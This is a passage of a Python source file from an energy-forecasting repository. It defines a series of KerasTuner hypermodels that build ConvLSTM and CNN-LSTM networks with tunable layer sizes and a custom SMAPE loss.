1b1ef729bfe6870880ec2b3f58f8d04117f29bc5 | ddf9d47a06ce85f9d06ec4923982f96996e028a7 | /Notebooks/Entrenamiento Modelo/CustomHyperModelImages.py | 2f49fceefd6a2ddbc8d07d8b4f3d7947bbe71e0f | [] | no_license | SebasPelaez/colombia-energy-forecast | f7b7a184026d3eb22a2087fda39249998ba1128e | 269d432dfda0e976aa06d1b9b7804945d9362af3 | refs/heads/master | 2023-04-14T18:36:14.294769 | 2021-04-21T14:01:58 | 2021-04-21T14:01:58 | 286,310,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,779 | py | import tensorflow as tf
import CustomMetrics
from kerastuner import HyperModel
class ArquitecturaI1(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_3", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_5", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_5", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_5",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_6", min_value=3, max_value=5, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_8", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
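# Illustrative search driver (an assumption, not part of this module) showing
# how one of these hypermodels would typically be handed to a KerasTuner search;
# the input shape and forecast horizon below are made-up placeholder values:
#
#     from kerastuner.tuners import RandomSearch
#     hypermodel = ArquitecturaI1(input_shape=(5, 64, 64, 3), n_steps_out=24)
#     tuner = RandomSearch(hypermodel, objective='val_loss', max_trials=10,
#                          directory='tuning', project_name='arquitectura_i1')
#     tuner.search(x_train, y_train, validation_data=(x_val, y_val), epochs=5)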
class ArquitecturaI2(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_2", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_3", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_4", min_value=3, max_value=5, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_6", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_6_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI3(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_4", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_4_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI4(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_3", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_5", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_5", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_5",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_6", min_value=3, max_value=5, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI5(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_2", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_3", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_4", min_value=3, max_value=5, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI6(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI7(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_3", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_5", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_5", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_5",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_6", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_7", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_7",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_7",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_8", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_8_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI8(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_3", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_4", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_6", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_6",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_6",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_7", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_7_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI9(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_3", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_4",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_4",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_5", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_5_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI10(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_3", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_5", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_5", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_5",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_6", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_7", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_7",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_7",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI11(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_3", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_4", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_6", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_6",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_6",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI12(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_3", min_value=64, max_value=448, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_4",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_4",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI13(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=16, step=8, default=16
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_4", min_value=64, max_value=448, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(l1=0),
dropout=hp.Float(
"dropout_regularizer_layer_4",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_5", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_5_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-5,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI14(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=16, step=8, default=16
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_4", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(l1=0),
dropout=hp.Float(
"dropout_regularizer_layer_4",
